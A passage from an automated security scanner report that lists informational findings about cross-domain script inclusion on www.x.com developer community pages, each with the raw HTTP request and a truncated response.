<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.18. https://www.x.com/community/ppx/dev-tools/decision_tree

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/dev-tools/decision_tree

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/dev-tools/decision_tree HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:22 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323135343b31342c323131353b31342c323131313b31342c323232363b31342c323134393b31342c323038363b31342c323038323b31342c323030353b31342c323134343b31342c323134363b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:23 GMT; Path=/
Vary: User-Agent
JP: D=61135 t=1313157083274538
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.19. https://www.x.com/community/ppx/devchallenge

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/devchallenge

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/devchallenge HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:21 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323131353b31342c323038363b31342c323134393b31342c323131313b31342c323038323b31342c323030353b31342c323134343b31342c323134363b31342c323134323b31342c323134333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:21 GMT; Path=/
Vary: User-Agent
JP: D=53170 t=1313157081752731
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.20. https://www.x.com/community/ppx/devchallenge/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/devchallenge/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/devchallenge/ HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:22 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323131353b31342c323131313b31342c323232363b31342c323134393b31342c323038363b31342c323038323b31342c323030353b31342c323134343b31342c323134363b31342c323134323b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:23 GMT; Path=/
Vary: User-Agent
JP: D=56010 t=1313157082994090
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.21. https://www.x.com/community/ppx/developer

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/developer

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/developer HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:23 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323037333b31342c323135343b31342c323131353b31342c323131313b31342c323232363b31342c323134393b31342c323038363b31342c323038323b31342c323030353b31342c323134343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:23 GMT; Path=/
Vary: User-Agent
JP: D=127401 t=1313157083736368
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.22. https://www.x.com/community/ppx/devtalk

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/devtalk

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/devtalk HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:20 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323131313b31342c323134393b31342c323038323b31342c323131353b31342c323038363b31342c323030353b31342c323134343b31342c323134363b31342c323134323b31342c323134333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:21 GMT; Path=/
Vary: User-Agent
JP: D=227171 t=1313157081321481
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.23. https://www.x.com/community/ppx/devzone

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/devzone

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/devzone HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:06 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323133333b31342c323032343b31342c323131343b31342c323033343b31342c323032353b31342c323036333b31342c323032333b31342c323036343b31342c323032323b31342c323033323b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:07 GMT; Path=/
Vary: User-Agent
JP: D=144424 t=1313157066963707
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.24. https://www.x.com/community/ppx/documentation

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/documentation

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/documentation HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:04 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323032323b31342c323036343b31342c323036333b31342c323033323b31342c323033373b31342c323033303b31342c323032393b31342c323032383b31342c323032373b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:04 GMT; Path=/
Vary: User-Agent
JP: D=195109 t=1313157064805423
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.25. https://www.x.com/community/ppx/ec

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/ec

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/ec HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/index.jspa
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7238D44EFB679CF81CE553C3866BE5EA.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 01:59:40 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030383b; Expires=Sun, 11-Sep-2011 01:59:40 GMT; Path=/
Vary: User-Agent
JP: D=109211 t=1313114380657704
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.26. https://www.x.com/community/ppx/emailPasswordToken!input.jspa

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/emailPasswordToken!input.jspa

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/emailPasswordToken!input.jspa HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:18 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=14343 t=1313157079484555
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.27. https://www.x.com/community/ppx/feedback

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/feedback

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/feedback HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:19 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323038363b31342c323038323b31342c323134323b31342c323030353b31342c323134343b31342c323134363b31342c323134333b31342c323134353b31342c323034373b31342c323034363b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:20 GMT; Path=/
Vary: User-Agent
JP: D=75997 t=1313157080027534
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.28. https://www.x.com/community/ppx/fundraising

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/fundraising

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/fundraising HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:17 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323134353b31342c323134323b31342c323030353b31342c323134333b31342c323034373b31342c323034363b31342c323034353b31342c323034343b31342c323034333b31342c323133303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:18 GMT; Path=/
Vary: User-Agent
JP: D=83960 t=1313157078276262
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>


<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynam
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynam
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.29. https://www.x.com/community/ppx/global

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/global HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/community/ppx/showcase
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323131343b31342c323237363b31342c323030383b332c35333735313b332c36303039313b332c3133363935343b332c3133383538323b332c3133373131353b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:39:03 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030343b31342c323131343b31342c323237363b31342c323030383b332c35333437343b332c35333735313b332c35333436333b332c38393433393b332c323030383b332c36303039313b332c3133363935343b332c3133383538323b332c3133373131353b; Expires=Sun, 11-Sep-2011 13:39:04 GMT; Path=/
Vary: User-Agent
JP: D=186175 t=1313156344173833
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.30. https://www.x.com/community/ppx/global/au

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/au

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/global/au HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323033393b31342c323030343b31342c323131343b31342c323133333b31342c323032353b31342c323033343b31342c323032333b31342c323032343b31342c323036333b31342c323036343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:10 GMT; Path=/
Vary: User-Agent
JP: D=67754 t=1313157070067212
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.31. https://www.x.com/community/ppx/global/ca

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/ca

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/global/ca HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034303b31342c323133313b31342c323030343b31342c323033393b31342c323131343b31342c323133333b31342c323032353b31342c323033343b31342c323032333b31342c323032343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:10 GMT; Path=/
Vary: User-Agent
JP: D=100595 t=1313157070639699
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.32. https://www.x.com/community/ppx/global/cn

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/cn

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/global/cn HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323133313b31342c323030343b31342c323033393b31342c323034303b31342c323131343b31342c323133333b31342c323032353b31342c323033343b31342c323032333b31342c323032343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:10 GMT; Path=/
Vary: User-Agent
JP: D=70307 t=1313157070898066
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.33. https://www.x.com/community/ppx/global/de

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/de

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/global/de HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:12 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034323b31342c323133313b31342c323034313b31342c323034303b31342c323030343b31342c323033393b31342c323131343b31342c323133333b31342c323032353b31342c323033343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:12 GMT; Path=/
Vary: User-Agent
JP: D=91052 t=1313157072186357
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.34. https://www.x.com/community/ppx/global/fr

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/fr

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/global/fr HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:11 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034313b31342c323034303b31342c323033393b31342c323133313b31342c323030343b31342c323131343b31342c323133333b31342c323032353b31342c323033343b31342c323032333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:11 GMT; Path=/
Vary: User-Agent
JP: D=90705 t=1313157071522380
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
